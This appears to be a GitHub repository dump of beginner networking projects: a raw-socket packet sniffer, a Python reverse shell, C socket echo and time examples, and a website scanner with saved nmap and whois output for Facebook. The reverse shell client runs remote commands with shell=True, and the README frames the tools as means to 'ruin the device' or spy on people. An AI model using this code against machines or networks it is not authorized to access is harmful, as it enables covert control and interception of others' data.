ethernet_frame(raw_data) 22 | print('\nEthernet Frame: ') 23 | print(TAB_1 + 'Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_protocol)) 24 | 25 | # 8 for IPv4 26 | if eth_protocol == 8: 27 | version, header_length, ttl, proto, src, target, data = ipv4_packet(data) 28 | print(TAB_1 + 'IPv4 Packet: ') 29 | print(TAB_2 + 'Version: {}, Header Length: {}, TTL: {},'.format(version, header_length, ttl)) 30 | print(TAB_2 + 'Protocol: {}, Source: {}, Target: {}'.format(proto, src, target)) 31 | 32 | # ICMP Type 33 | if proto == 1: 34 | icmp_type, code, checksum, data = icmp_packet(data) 35 | print(TAB_1 + 'ICMP Packet:') 36 | print(TAB_2 + 'Type: {}, Code: {}, Checksum: {}'.format(icmp_type, code, checksum)) 37 | print(TAB_2 + 'Data:') 38 | print(format_multi_line(DATA_TAB_3, data)) 39 | 40 | # TCP Type 41 | elif proto == 6: 42 | src_port, dest_port, sequence, acknowledgement, flag_urg, flag_ack, flag_psh, flag_rst, flag_syn,\ 43 | flag_fin, data = tcp_packet(data) 44 | print(TAB_1 + 'TCP Packet:') 45 | print(TAB_2 + 'Source Port: {}, Destination Port: {}'.format(src_port, dest_port)) 46 | print(TAB_2 + 'Sequence: {}, Acknowledgement: {}'.format(sequence, acknowledgement)) 47 | print(TAB_2 + 'Flags:') 48 | print(TAB_3 + 'URG: {}, ACK: {}, PSH: {}, RST: {}, SYN: {}, fin: {}'.format(flag_urg, flag_ack, 49 | flag_psh, flag_rst, 50 | flag_syn, flag_fin)) 51 | print(TAB_2 + 'Data:') 52 | print(format_multi_line(DATA_TAB_3, data)) 53 | 54 | # UDP Type 55 | elif proto == 17: 56 | src_port, dest_port, size, data = udp_packet(data) 57 | print(TAB_1 + 'UDP Packet:') 58 | print(TAB_2 + 'Source Port: {}, Destination Port: {}, Length: {}'.format(src_port, dest_port, size)) 59 | print(TAB_2 + 'Data:') 60 | print(format_multi_line(DATA_TAB_3, data)) 61 | 62 | # Other 63 | else: 64 | print(TAB_1 + 'Data:') 65 | print(format_multi_line(DATA_TAB_2, data)) 66 | 67 | 68 | # Unpack Network Data (ethernet frame) 69 | def ethernet_frame(data): 70 | dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) 71 | return get_mac_address(dest_mac), get_mac_address(src_mac), socket.htons(proto), data[14:] 72 | 73 | 74 | # Return properly formatted MAC Address (i.e AA:56:BB:CC:JH:45) 75 | def get_mac_address(byte_address): 76 | bytes_str = map('{:02x}'.format, byte_address) 77 | address = ':'.join(bytes_str).upper() 78 | return address 79 | 80 | 81 | # Unpacks IPv4 Packet 82 | def ipv4_packet(data): 83 | version_header_length = data[0] 84 | version = version_header_length >> 4 85 | header_length = (version_header_length & 15) * 4 86 | ttl, proto, src, target = struct.unpack('! 8x B B 2x 4s 4s', data[:20]) 87 | return version, header_length, ttl, proto, ipv4(src), ipv4(target), data[header_length:] 88 | 89 | 90 | # Returns properly formatted IPv4 Address (i.e 172.24.151.128) 91 | def ipv4(address): 92 | return '.'.join(map(str, address)) 93 | 94 | 95 | # Unpacks ICMP Packet 96 | def icmp_packet(data): 97 | icmp_type, code, checksum = struct.unpack('! B B H', data[:4]) 98 | return icmp_type, code, checksum, data[4:] 99 | 100 | 101 | # Unpacks TCP Packet 102 | def tcp_packet(data): 103 | src_port, dest_port, sequence, acknowledgement, offset_reserved_flags = struct.unpack('! H H L L H', data[:14]) 104 | offset = (offset_reserved_flags >> 12) * 4 105 | flag_urg = (offset_reserved_flags & 32) >> 5 106 | flag_ack = (offset_reserved_flags & 16) >> 4 107 | flag_psh = (offset_reserved_flags & 8) >> 3 108 | flag_rst = (offset_reserved_flags & 4) >> 2 109 | flag_syn = (offset_reserved_flags & 2) >> 1 110 | flag_fin = offset_reserved_flags & 1 111 | return src_port, dest_port, sequence, acknowledgement, flag_urg, flag_ack, flag_psh, flag_rst, flag_syn, flag_fin,\ 112 | data[offset:] 113 | 114 | 115 | # Unpacks UDP segment 116 | def udp_packet(data): 117 | src_port, dest_port, size = struct.unpack('! H H 2x H', data[:8]) 118 | return src_port, dest_port, size, data[8:] 119 | 120 | 121 | # Formats Multi-line Data 122 | def format_multi_line(prefix, string, size=80): 123 | size -= len(prefix) 124 | if isinstance(string, bytes): 125 | string = ''.join(r'\x{:02x}'.format(byte) for byte in string) 126 | if size % 2: 127 | size -= 1 128 | return '\n'.join([prefix + line for line in textwrap.wrap(string, size)]) 129 | 130 | 131 | main() 132 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python Networking Projects 2 | 3 | ## Reverse-Shell 4 | 5 | A shell which can access information about any remote server. The interface looks like a bash terminal virtually running 6 | on your PC, although everything that is displayed is the content of the server. 7 | 8 | To access control, you need firewall permissions. So its best to try it out on your own server. 9 | 10 | ### Usage 11 | 12 | Run `server.py` in the background (in your workstation). It will create a socket server and will be listening to the port `8888` 13 | 14 | Now you need to run the file `client.py` in the device you want to control. On running it for the first time, a request 15 | will be sent to the server running on your machine. The server will acknowledge that request and will respond with bash commands 16 | you enter in the shell. Same commands will be carried out in the client and the final response will be printed out on your shell. 17 | Though it might look like you are running those commands on your machine but you have actually connected to the target (`client`) 18 | 19 | Now you're all setup to ruin the device :smiling_imp: 20 | 21 | ## Packet-Sniffer 22 | 23 | Packet Sniffer is a program to get access to the data flowing through your router/ethernet. Any kind of data can be sniffed from the 24 | browser. 25 | 26 | Needs Super-User permission for certain utilities to function. 27 | 28 | ### Description 29 | The file `sniffer.py` when run with python 3 will listen to packets recieved from the socket connection. On receiving the ethernet frame, the program 30 | will break it into individual pieces to ascertain the kind of Protocols. i.e `IPv4/IPv6` and `ICMP,TCP,UDP` (`ICMP: Internet Control 31 | Message Protocol`, `TCP: Transmission Control Protocol (Most Common)`, `UDP: User Datagram Protocol`). Each protocol incorporates discrete 32 | byte information. So the method to unpack the data is distinct. In all the cases though, we'll get Source and Destination Ports (MAC Addresses). 33 | 34 | Useful for finding out the bottlenecks in your network or just spying on someone :smiling_imp: 35 | 36 | ## Website-Scanner 37 | 38 | A tool to scan a particular website and extract useful information out of it 39 | 40 | ### Description 41 | Following information is obtained 42 | * Nmap port scan 43 | * IP Address 44 | * Whois detail 45 | * robots.txt 46 | 47 | Input is expected as the name of project directory and the full Url of the website 48 | 49 | **TODO**: Check for existence of robots.txt. Many websites allow full scraping access. 50 | 51 | ### Credits: 52 | [TheNewBoston](https://thenewboston.com) 53 | -------------------------------------------------------------------------------- /Reverse-Shell/client.py: -------------------------------------------------------------------------------- 1 | import os 2 | import socket 3 | import subprocess 4 | 5 | 6 | s = socket.socket() 7 | host = '172.24.129.58' 8 | port = 8888 9 | s.connect((host, port)) 10 | 11 | while True: 12 | data = s.recv(1024) 13 | 14 | if data[:2].decode('utf-8') == 'cd': 15 | os.chdir(data[3:].decode('utf-8')) 16 | 17 | if len(data) > 0: 18 | cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE, 19 | stderr=subprocess.PIPE, stdin=subprocess.PIPE) 20 | output_bytes = cmd.stdout.read() + cmd.stderr.read() 21 | output_str = str(output_bytes, 'utf-8') 22 | 23 | s.send(str.encode(output_str + str(os.getcwd()) + ' ~$ ')) 24 | print(output_str) 25 | 26 | # Close Connection 27 | s.close() 28 | -------------------------------------------------------------------------------- /Reverse-Shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | 4 | 5 | # Create a socket (Connect two computers) 6 | def socket_create(): 7 | try: 8 | global host 9 | global port 10 | global s 11 | 12 | host = '' 13 | port = 8888 14 | s = socket.socket() 15 | 16 | except socket.error as msg: 17 | print('Socket Creation Error: ' + str(msg)) 18 | 19 | 20 | # Bind socket to Port and listen to connection 21 | def socket_bind(): 22 | try: 23 | global host 24 | global port 25 | global s 26 | 27 | print("Binding to the Port " + str(port)) 28 | 29 | s.bind((host, port)) 30 | s.listen(5) 31 | 32 | except socket.error as msg: 33 | print('Socket Binding Error: ' + str(msg) + '\n' + 'Retrying...') 34 | socket_bind() 35 | 36 | 37 | # Establish a connection with the client (socket must be listening) 38 | def socket_accept(): 39 | conn, address = s.accept() 40 | print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1])) 41 | 42 | send_commands(conn) 43 | s.close() 44 | 45 | 46 | # Send commands to the client 47 | def send_commands(conn): 48 | while True: 49 | cmd = input() 50 | 51 | if cmd == 'quit': 52 | conn.close() 53 | s.close() 54 | sys.exit() 55 | 56 | if len(str.encode(cmd)) > 0: 57 | conn.send(str.encode(cmd)) 58 | client_response = str(conn.recv(1024), 'utf-8') 59 | print(client_response, end="") 60 | 61 | 62 | # Main function 63 | def main(): 64 | socket_create() 65 | socket_bind() 66 | socket_accept() 67 | 68 | 69 | main() 70 | -------------------------------------------------------------------------------- /Sockets/echo/echoClient.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #define ERROR -1 12 | #define BUFFER 1024 13 | 14 | int main(int argc, char **argv){ 15 | struct sockaddr_in server; 16 | int sockfd, len, bytes_recv; 17 | char input[BUFFER], output[BUFFER]; 18 | 19 | len = sizeof(struct sockaddr_in); 20 | 21 | // Creating Socket 22 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == ERROR){ 23 | perror("Socket error"); 24 | exit(ERROR); 25 | } 26 | 27 | // Assigning addresses 28 | server.sin_family = AF_INET; // IPv4 29 | server.sin_port = htons(atoi(argv[2])); // Port in network bytes 30 | server.sin_addr.s_addr = inet_addr(argv[1]); // All available interfaces 31 | bzero(&server.sin_zero, 8); // Zero padding 32 | 33 | // Connect to server 34 | if((connect(sockfd, (struct sockaddr *)&server, len)) == ERROR){ 35 | perror("Connect error"); 36 | exit(ERROR); 37 | } 38 | 39 | while(1){ 40 | fgets(input, BUFFER, stdin); 41 | send(sockfd, input, strlen(input), 0); 42 | 43 | bytes_recv = recv(sockfd, output, BUFFER, 0); 44 | output[bytes_recv] = '\0'; 45 | printf("%s\n", output); 46 | } 47 | 48 | close(sockfd); 49 | 50 | 51 | 52 | 53 | } -------------------------------------------------------------------------------- /Sockets/echo/echoServer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #define ERROR -1 12 | #define MAX_CLIENTS 2 13 | #define MAX_DATA 1024 14 | 15 | int main(int argc, int **argv){ 16 | int sockfd, clientfd; // File descriptors 17 | struct sockaddr_in server, client; // Sockaddr_in structure 18 | int len; // length of sockaddr_in structure 19 | char data[MAX_DATA]; 20 | char msg[] = "Hello! This is an Assassin\n"; 21 | int bytes_sent; // No of bytes sent 22 | int tr=1; // Integer for setsockopt 23 | 24 | // Creating Socket 25 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == ERROR){ 26 | perror("Socket error"); 27 | exit(ERROR); 28 | } 29 | 30 | // Assigning addresses 31 | server.sin_family = AF_INET; // IPv4 32 | server.sin_port = htons(atoi(argv[1])); // Port in network bytes 33 | server.sin_addr.s_addr = INADDR_ANY; // All available interfaces 34 | bzero(&server.sin_zero, 8); // Zero padding 35 | 36 | len = sizeof(struct sockaddr_in); 37 | 38 | // Kill "Address already in use" error message 39 | if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &tr, sizeof(int)) == ERROR) { 40 | perror("setsockopt"); 41 | exit(ERROR); 42 | } 43 | 44 | // Bind to the address 45 | if((bind(sockfd, (struct sockaddr *)&server, len)) == ERROR){ 46 | perror("Bind error"); 47 | exit(ERROR); 48 | } 49 | 50 | //Listen for connections 51 | if((listen(sockfd, MAX_CLIENTS)) == ERROR){ 52 | perror("Listen error"); 53 | exit(ERROR); 54 | } 55 | 56 | // Start listening to the clients 57 | while(1){ 58 | 59 | // Accept connection from a client and return the new socket 60 | if((clientfd = accept(sockfd, (struct sockaddr *)&client, &len)) == ERROR){ 61 | perror("Accept error"); 62 | exit(ERROR); 63 | } 64 | 65 | // Print the connection information 66 | printf("New client connected from port no %d and IP %s\n", 67 | ntohs(client.sin_port), inet_ntoa(client.sin_addr)); 68 | 69 | // Send the message after connection completes 70 | if((bytes_sent = send(clientfd, msg, strlen(msg), 0)) == ERROR){ 71 | perror("Send error"); 72 | exit(ERROR); 73 | } 74 | 75 | printf("Sent %d bytes to Client %s\n", 76 | bytes_sent, inet_ntoa(client.sin_addr)); 77 | 78 | int data_len = 1; 79 | 80 | // Keep sending the same data till no response from client 81 | while(data_len){ 82 | data_len = recv(clientfd, data, MAX_DATA , 0); 83 | 84 | if(data_len){ 85 | send(clientfd, data, data_len, 0); 86 | data[data_len] = '\0'; 87 | printf("Sent message: %s\n", data); 88 | } 89 | } 90 | 91 | printf("Client disconnected"); 92 | 93 | // Close the connection 94 | close(clientfd); 95 | } 96 | } -------------------------------------------------------------------------------- /Sockets/time/timeClient.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | int main(int argc, char *argv[]) 13 | { 14 | int sockfd = 0, n = 0; 15 | char recvBuff[1024]; 16 | struct sockaddr_in serv_addr; 17 | 18 | if(argc != 2) 19 | { 20 | printf("\n Usage: %s \n",argv[0]); 21 | return 1; 22 | } 23 | 24 | memset(recvBuff, '0',sizeof(recvBuff)); 25 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) 26 | { 27 | printf("\n Error : Could not create socket \n"); 28 | return 1; 29 | } 30 | 31 | memset(&serv_addr, '0', sizeof(serv_addr)); 32 | 33 | serv_addr.sin_family = AF_INET; 34 | serv_addr.sin_port = htons(5000); 35 | 36 | if(inet_pton(AF_INET, argv[1], &serv_addr.sin_addr)<=0) 37 | { 38 | printf("\n inet_pton error occured\n"); 39 | return 1; 40 | } 41 | 42 | if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) 43 | { 44 | printf("\n Error : Connect Failed \n"); 45 | return 1; 46 | } 47 | 48 | while ( (n = read(sockfd, recvBuff, sizeof(recvBuff)-1)) > 0) 49 | { 50 | recvBuff[n] = 0; 51 | if(fputs(recvBuff, stdout) == EOF) 52 | { 53 | printf("\n Error : Fputs error\n"); 54 | } 55 | } 56 | 57 | if(n < 0) 58 | { 59 | printf("\n Read error \n"); 60 | } 61 | 62 | return 0; 63 | } 64 | -------------------------------------------------------------------------------- /Sockets/time/timeServer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | int main(int argc, char *argv[]) 13 | { 14 | int listenfd = 0, connfd = 0; 15 | struct sockaddr_in serv_addr; 16 | 17 | char sendBuff[1025]; 18 | time_t ticks; 19 | 20 | listenfd = socket(AF_INET, SOCK_STREAM, 0); 21 | memset(&serv_addr, '0', sizeof(serv_addr)); 22 | memset(sendBuff, '0', sizeof(sendBuff)); 23 | 24 | serv_addr.sin_family = AF_INET; 25 | serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); 26 | serv_addr.sin_port = htons(5000); 27 | 28 | bind(listenfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr)); 29 | 30 | listen(listenfd, 10); 31 | 32 | while(1) 33 | { 34 | connfd = accept(listenfd, (struct sockaddr*)NULL, NULL); 35 | 36 | ticks = time(NULL); 37 | snprintf(sendBuff, sizeof(sendBuff), "%.24s\r\n", "Apple"; 38 | write(connfd, sendBuff, strlen(sendBuff)); 39 | 40 | close(connfd); 41 | sleep(1); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /Website-Scanner/domain.py: -------------------------------------------------------------------------------- 1 | from tld import get_tld 2 | 3 | 4 | def get_domain_name(url): 5 | domain_name = get_tld(url) 6 | return domain_name 7 | -------------------------------------------------------------------------------- /Website-Scanner/general.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | def create_directory(directory): 5 | if not os.path.exists(directory): 6 | os.makedirs(directory) 7 | 8 | 9 | def write_file(path, data): 10 | f = open(path, "w") 11 | f.write(data) 12 | f.close() 13 | 14 | -------------------------------------------------------------------------------- /Website-Scanner/ip_address.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | def get_ip_address(domain): 5 | command = "host " + str(domain) 6 | 7 | # Running the process 8 | process = os.popen(command) 9 | 10 | # Getting the IP from the output 11 | result = str(process.read()) 12 | marker = result.find("has address") + 12 13 | return result[marker:].splitlines()[0] 14 | 15 | -------------------------------------------------------------------------------- /Website-Scanner/main.py: -------------------------------------------------------------------------------- 1 | from domain import get_domain_name 2 | from general import create_directory, write_file 3 | from ip_address import get_ip_address 4 | from nmap import get_nmap 5 | from robots_txt import get_robots_txt 6 | from whois import get_whois 7 | from website import websites 8 | 9 | 10 | # Create a Root Directory to store all the results 11 | # Not to mess up with the source code 12 | ROOT_DIRS = 'websites' 13 | create_directory(ROOT_DIRS) 14 | 15 | 16 | def gather_info(name, url): 17 | print("Scanning " + url + '\n') 18 | 19 | print("Getting Domain Name...") 20 | domain_name = get_domain_name(url) 21 | print("Done\n") 22 | 23 | print("Getting the IP Address...") 24 | ip_address = get_ip_address(domain_name) 25 | print("Done\n") 26 | 27 | print("Running Nmap Scan...") 28 | nmap = get_nmap('-F', ip_address) 29 | print("Done\n") 30 | 31 | print("Fetching robots.txt...") 32 | robots_txt = get_robots_txt(url) 33 | print("Done\n") 34 | 35 | print("Extracting whois details...") 36 | whois = get_whois(domain_name) 37 | print("Done\n") 38 | 39 | # Create Final Report in a file 40 | create_report(name, url, domain_name, nmap, robots_txt, whois) 41 | print("Information for " + name + " saved in Websites/" + name + " Folder\n") 42 | 43 | 44 | def create_report(name, full_url, domain_name, nmap, robots_txt, whois): 45 | project_dir = ROOT_DIRS + '/' + name 46 | create_directory(project_dir) 47 | write_file(project_dir + '/full-url.txt', full_url) 48 | write_file(project_dir + '/domain-name.txt', domain_name) 49 | write_file(project_dir + '/nmap.txt', nmap) 50 | write_file(project_dir + '/robots-txt.txt', robots_txt) 51 | write_file(project_dir + '/whois.txt', whois) 52 | 53 | 54 | # print("Enter the name of project") 55 | # name = input() 56 | # print("\nEnter the full URL") 57 | # url = input() 58 | 59 | # gather_info(name, url) 60 | 61 | for web in websites: 62 | gather_info(web[0], web[1]) 63 | -------------------------------------------------------------------------------- /Website-Scanner/nmap.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | def get_nmap(option, ip): 5 | command = 'nmap ' + str(option) + ' ' + str(ip) 6 | process = os.popen(command) 7 | result = str(process.read()) 8 | return result 9 | -------------------------------------------------------------------------------- /Website-Scanner/robots_txt.py: -------------------------------------------------------------------------------- 1 | import urllib.request 2 | import io 3 | 4 | 5 | def get_robots_txt(url): 6 | # Check for a forward-slash 7 | if url.endswith('/'): 8 | path = url 9 | else: 10 | path = url + '/' 11 | 12 | # Request for robots.txt 13 | request = urllib.request.urlopen(path + 'robots.txt', data=None) 14 | data = io.TextIOWrapper(request, encoding='utf-8') 15 | return data.read() 16 | -------------------------------------------------------------------------------- /Website-Scanner/website.py: -------------------------------------------------------------------------------- 1 | websites = [('facebook', 'https://www.facebook.com'), 2 | ('gmail', 'https://gmail.com'), 3 | ('thenewboston', 'https://www.thenewboston.com'), 4 | ('reddit', 'https://reddit.com'), 5 | ('linkedin', 'https://linkedin.com'), 6 | 7 | ] 8 | -------------------------------------------------------------------------------- /Website-Scanner/websites/facebook/domain-name.txt: -------------------------------------------------------------------------------- 1 | facebook.com -------------------------------------------------------------------------------- /Website-Scanner/websites/facebook/full-url.txt: -------------------------------------------------------------------------------- 1 | https://www.facebook.com -------------------------------------------------------------------------------- /Website-Scanner/websites/facebook/nmap.txt: -------------------------------------------------------------------------------- 1 | 2 | Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-21 02:11 IST 3 | Nmap scan report for edge-star-mini-shv-01-bom1.facebook.com (157.240.16.35) 4 | Host is up (0.043s latency). 5 | Not shown: 98 filtered ports 6 | PORT STATE SERVICE 7 | 80/tcp open http 8 | 443/tcp open https 9 | 10 | Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds 11 | -------------------------------------------------------------------------------- /Website-Scanner/websites/facebook/robots-txt.txt: -------------------------------------------------------------------------------- 1 | # Notice: Crawling Facebook is prohibited unless you have express written 2 | # permission. See: http://www.facebook.com/apps/site_scraping_tos_terms.php 3 | 4 | User-agent: Applebot 5 | Disallow: /ajax/ 6 | Disallow: /album.php 7 | Disallow: /checkpoint/ 8 | Disallow: /contact_importer/ 9 | Disallow: /feeds/ 10 | Disallow: /file_download.php 11 | Disallow: /hashtag/ 12 | Disallow: /l.php 13 | Disallow: /live/ 14 | Disallow: /moments_app/ 15 | Disallow: /p.php 16 | Disallow: /photo.php 17 | Disallow: /photos.php 18 | Disallow: /sharer/ 19 | 20 | User-agent: baiduspider 21 | Disallow: /ajax/ 22 | Disallow: /album.php 23 | Disallow: /checkpoint/ 24 | Disallow: /contact_importer/ 25 | Disallow: /feeds/ 26 | Disallow: /file_download.php 27 | Disallow: /hashtag/ 28 | Disallow: /l.php 29 | Disallow: /live/ 30 | Disallow: /moments_app/ 31 | Disallow: /p.php 32 | Disallow: /photo.php 33 | Disallow: /photos.php 34 | Disallow: /sharer/ 35 | 36 | User-agent: Bingbot 37 | Disallow: /ajax/ 38 | Disallow: /album.php 39 | Disallow: /checkpoint/ 40 | Disallow: /contact_importer/ 41 | Disallow: /feeds/ 42 | Disallow: /file_download.php 43 | Disallow: /hashtag/ 44 | Disallow: /l.php 45 | Disallow: /live/ 46 | Disallow: /moments_app/ 47 | Disallow: /p.php 48 | Disallow: /photo.php 49 | Disallow: /photos.php 50 | Disallow: /sharer/ 51 | 52 | User-agent: Googlebot 53 | Disallow: /ajax/ 54 | Disallow: /album.php 55 | Disallow: /checkpoint/ 56 | Disallow: /contact_importer/ 57 | Disallow: /feeds/ 58 | Disallow: /file_download.php 59 | Disallow: /hashtag/ 60 | Disallow: /l.php 61 | Disallow: /live/ 62 | Disallow: /moments_app/ 63 | Disallow: /p.php 64 | Disallow: /photo.php 65 | Disallow: /photos.php 66 | Disallow: /sharer/ 67 | 68 | User-agent: ia_archiver 69 | Disallow: / 70 | Disallow: /ajax/ 71 | Disallow: /album.php 72 | Disallow: /checkpoint/ 73 | Disallow: /contact_importer/ 74 | Disallow: /feeds/ 75 | Disallow: /file_download.php 76 | Disallow: /hashtag/ 77 | Disallow: /l.php 78 | Disallow: /live/ 79 | Disallow: /moments_app/ 80 | Disallow: /p.php 81 | Disallow: /photo.php 82 | Disallow: /photos.php 83 | Disallow: /sharer/ 84 | 85 | User-agent: msnbot 86 | Disallow: /ajax/ 87 | Disallow: /album.php 88 | Disallow: /checkpoint/ 89 | Disallow: /contact_importer/ 90 | Disallow: /feeds/ 91 | Disallow: /file_download.php 92 | Disallow: /hashtag/ 93 | Disallow: /l.php 94 | Disallow: /live/ 95 | Disallow: /moments_app/ 96 | Disallow: /p.php 97 | Disallow: /photo.php 98 | Disallow: /photos.php 99 | Disallow: /sharer/ 100 | 101 | User-agent: Naverbot 102 | Disallow: /ajax/ 103 | Disallow: /album.php 104 | Disallow: /checkpoint/ 105 | Disallow: /contact_importer/ 106 | Disallow: /feeds/ 107 | Disallow: /file_download.php 108 | Disallow: /hashtag/ 109 | Disallow: /l.php 110 | Disallow: /live/ 111 | Disallow: /moments_app/ 112 | Disallow: /p.php 113 | Disallow: /photo.php 114 | Disallow: /photos.php 115 | Disallow: /sharer/ 116 | 117 | User-agent: seznambot 118 | Disallow: /ajax/ 119 | Disallow: /album.php 120 | Disallow: /checkpoint/ 121 | Disallow: /contact_importer/ 122 | Disallow: /feeds/ 123 | Disallow: /file_download.php 124 | Disallow: /hashtag/ 125 | Disallow: /l.php 126 | Disallow: /live/ 127 | Disallow: /moments_app/ 128 | Disallow: /p.php 129 | Disallow: /photo.php 130 | Disallow: /photos.php 131 | Disallow: /sharer/ 132 | 133 | User-agent: Slurp 134 | Disallow: /ajax/ 135 | Disallow: /album.php 136 | Disallow: /checkpoint/ 137 | Disallow: /contact_importer/ 138 | Disallow: /feeds/ 139 | Disallow: /file_download.php 140 | Disallow: /hashtag/ 141 | Disallow: /l.php 142 | Disallow: /live/ 143 | Disallow: /moments_app/ 144 | Disallow: /p.php 145 | Disallow: /photo.php 146 | Disallow: /photos.php 147 | Disallow: /sharer/ 148 | 149 | User-agent: teoma 150 | Disallow: /ajax/ 151 | Disallow: /album.php 152 | Disallow: /checkpoint/ 153 | Disallow: /contact_importer/ 154 | Disallow: /feeds/ 155 | Disallow: /file_download.php 156 | Disallow: /hashtag/ 157 | Disallow: /l.php 158 | Disallow: /live/ 159 | Disallow: /moments_app/ 160 | Disallow: /p.php 161 | Disallow: /photo.php 162 | Disallow: /photos.php 163 | Disallow: /sharer/ 164 | 165 | User-agent: Twitterbot 166 | Disallow: /ajax/ 167 | Disallow: /album.php 168 | Disallow: /checkpoint/ 169 | Disallow: /contact_importer/ 170 | Disallow: /feeds/ 171 | Disallow: /file_download.php 172 | Disallow: /hashtag/ 173 | Disallow: /l.php 174 | Disallow: /live/ 175 | Disallow: /moments_app/ 176 | Disallow: /p.php 177 | Disallow: /photo.php 178 | Disallow: /photos.php 179 | Disallow: /sharer/ 180 | 181 | User-agent: Yandex 182 | Disallow: /ajax/ 183 | Disallow: /album.php 184 | Disallow: /checkpoint/ 185 | Disallow: /contact_importer/ 186 | Disallow: /feeds/ 187 | Disallow: /file_download.php 188 | Disallow: /hashtag/ 189 | Disallow: /l.php 190 | Disallow: /live/ 191 | Disallow: /moments_app/ 192 | Disallow: /p.php 193 | Disallow: /photo.php 194 | Disallow: /photos.php 195 | Disallow: /sharer/ 196 | 197 | User-agent: Yeti 198 | Disallow: /ajax/ 199 | Disallow: /album.php 200 | Disallow: /checkpoint/ 201 | Disallow: /contact_importer/ 202 | Disallow: /feeds/ 203 | Disallow: /file_download.php 204 | Disallow: /hashtag/ 205 | Disallow: /l.php 206 | Disallow: /live/ 207 | Disallow: /moments_app/ 208 | Disallow: /p.php 209 | Disallow: /photo.php 210 | Disallow: /photos.php 211 | Disallow: /sharer/ 212 | 213 | User-agent: Applebot 214 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 215 | Allow: /safetycheck/ 216 | 217 | User-agent: baiduspider 218 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 219 | Allow: /safetycheck/ 220 | 221 | User-agent: Bingbot 222 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 223 | Allow: /safetycheck/ 224 | 225 | User-agent: Googlebot 226 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 227 | Allow: /safetycheck/ 228 | 229 | User-agent: ia_archiver 230 | Allow: /about/privacy 231 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 232 | Allow: /full_data_use_policy 233 | Allow: /legal/terms 234 | Allow: /policy.php 235 | Allow: /safetycheck/ 236 | 237 | User-agent: msnbot 238 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 239 | Allow: /safetycheck/ 240 | 241 | User-agent: Naverbot 242 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 243 | Allow: /safetycheck/ 244 | 245 | User-agent: seznambot 246 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 247 | Allow: /safetycheck/ 248 | 249 | User-agent: Slurp 250 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 251 | Allow: /safetycheck/ 252 | 253 | User-agent: teoma 254 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 255 | Allow: /safetycheck/ 256 | 257 | User-agent: Twitterbot 258 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 259 | Allow: /safetycheck/ 260 | 261 | User-agent: Yandex 262 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 263 | Allow: /safetycheck/ 264 | 265 | User-agent: Yeti 266 | Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet 267 | Allow: /safetycheck/ 268 | 269 | User-agent: * 270 | Disallow: / 271 | 272 | -------------------------------------------------------------------------------- /Website-Scanner/websites/facebook/whois.txt: -------------------------------------------------------------------------------- 1 | Domain Name: FACEBOOK.COM 2 | Registry Domain ID: 2320948_DOMAIN_COM-VRSN 3 | Registrar WHOIS Server: whois.markmonitor.com 4 | Registrar URL: http://www.markmonitor.com 5 | Updated Date: 2016-11-29T20:28:07Z 6 | Creation Date: 1997-03-29T05:00:00Z 7 | Registry Expiry Date: 2025-03-30T04:00:00Z 8 | Registrar: MarkMonitor Inc. 9 | Registrar IANA ID: 292 10 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 11 | Registrar Abuse Contact Phone: +1.2083895740 12 | Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited 13 | Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 14 | Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited 15 | Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited 16 | Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited 17 | Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited 18 | Name Server: A.NS.FACEBOOK.COM 19 | Name Server: B.NS.FACEBOOK.COM 20 | DNSSEC: unsigned 21 | URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 22 | >>> Last update of whois database: 2017-10-20T20:41:20Z <<< 23 | 24 | For more information on Whois status codes, please visit https://icann.org/epp 25 | 26 | NOTICE: The expiration date displayed 